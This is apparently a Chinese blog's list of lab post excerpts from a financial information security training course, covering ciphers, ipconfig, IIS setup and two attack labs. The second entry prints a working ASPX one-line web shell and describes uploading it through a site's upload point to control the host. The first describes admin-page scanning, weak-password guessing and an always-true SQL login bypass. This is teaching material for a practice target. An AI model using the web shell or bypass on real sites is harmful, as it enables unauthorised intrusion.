![](https://img-blog.csdnimg.cn/20201014180756919.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
金融信息安全实训
m0_53233211
这个作者很懒,什么都没留下…
展开
-
金融信息安全实训6
公钥加密之安全密钥分配利用RSA算法实现对称密钥的安全分配小A同学准备一些文字,选择一个密钥利用DES-Tool对文字进行加密得到密文1。小B同学运行RSA-Tool,生成公钥和私钥,将公钥发送给小A同学,私钥自己留存。小A同学利用小B同学的公钥对加密信件时使用的对称密钥进行加密,得到密文2。将密文1和密文2一同发送给小B同学。小B同学首先用自己的私钥解密密文2,接着利用解密密文2得到的对称密钥在DES-Tool中解密密文1,得到原始文字内容。解密密文1得到的结果的原创 2022-04-21 18:42:23 · 235 阅读 · 0 评论 -
金融信息安全实训5
3DES算法:解释3DES即三重数据加密算法,相当于是对每个数据块应用三次DES加密。由于计算机运算能力的增强,原版DES密码的密钥长度变得容易被暴力破解;3DES即是设计用来提供一种相对简单的方法,即通过增加DES的密钥长度来避免类似的攻击。-3DES使用3个密钥,对明文先使用key1进行des加密形成密文1,接着使用key2对密文1进行解密形成密文2,最后使用key3对密文2进行加密形成密文3。即:密文=EK3(DK2(EK1(明文))),明文=DK1(EK2(DK3(密文)))3DE原创 2022-04-21 18:28:57 · 250 阅读 · 0 评论 -
金融信息安全实训4
古典密码学这节课的内容为解密密文。利用以下方法进对密文行解密。当铺密码密文:"由人俱乙口一中"和"大中口由人由工"具有相同的含义。解密:5201314当铺密码 就是一种将中文和数字进行转化的密码,算法相当简单:当前汉字有多少笔画出头,就是转化成数字几。例如:王:该字外面有 6 个出头的位置,所以该汉字对应的数字就是 6;口:该字外面没有出头的位置,那就是0;人:该字外面有 3 个出头的位置,所以该汉字对应的数字就是 3;所以"大中口由人由工"为5201314,而"由人俱乙口一中"看得是原创 2022-04-20 19:05:25 · 2261 阅读 · 0 评论 -
金融信息安全实训3
利用ipconfig命令获取本地网络信息-准备工作:启动命令行环境按win+R键,打开运行,输入cmd,点击确定,进入命令行环境(win10可直接搜索“cmd”)。ipconfig命令是调试计算机网络的常用命令,通常大家使用它显示计算机中网络适配器的IP地址、子网掩码及默认网关。ipconfig/all命令显示所有网络适配器(网卡、拨号连接等)的完整TCP/IP配置信息。与ipconfig相比,它的信息更全更多,如IP是否动态分配、显示网卡的物理地址等。ipconfig/releas原创 2022-04-20 18:38:06 · 685 阅读 · 0 评论 -
在windows上部署一个IIS web服务
准备工作首先,要关闭防火墙和杀毒软件,接入某局域网。程序和功能-启用或关闭windows功能具体步骤如下:win7步骤1、程序和功能中添加web管理工具、万维网服务,web核心2.安装IIS相关环境并利用IIS服务器发布靶站源代码,应用程序池使用.net 4.0并开启.NET服务3.在iis里部署网站,注意应用程序池选.net 4.0,并在.net 4.0程序池的高级设置里把32位应用程序设置为true4.如果.net环境安装不全可在CMD下输入:“%WINDIR%\Microsof原创 2022-04-18 21:39:34 · 686 阅读 · 0 评论 -
金融信息安全实训2
上传后门程序(木马)并控制目标主机一句话木马的使用1、新建文本文档muma.txt,将文件后缀修改为aspx,书写内容如下:<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>2、在系统中寻找文件上传点。如图在友情链接是个上传点3、上传之前创建的aspx一句话木马文件。将写的muma.aspx上传4、设法获得上传文件在网站目录中的文件名称和路径。右击上传的文件,即原创 2022-04-19 20:32:22 · 76 阅读 · 0 评论 -
金融信息安全实训1
网站后台绕过1、猜测网站的后台管理地址或使用御剑孤独后台扫描工具暴力搜索进入后台登录界面。用御剑孤独后台可扫描出有哪些页面,如图该主机网址存在/robots.txt,/admin/login.aspx,/Index.aspx,/admin/left.aspx页面。2、尝试使用弱密码登录系统,观察登陆界面给出的反馈。例如猜测密码为admin,sa等常用的密码。3、输入一些特殊字符,如‘’/±=等,点击登录,观察系统反馈。4、根据登录界面给出的反馈构造永真的SQL语句绕过登录界面。根据后原创 2022-04-19 20:18:41 · 122 阅读 · 1 评论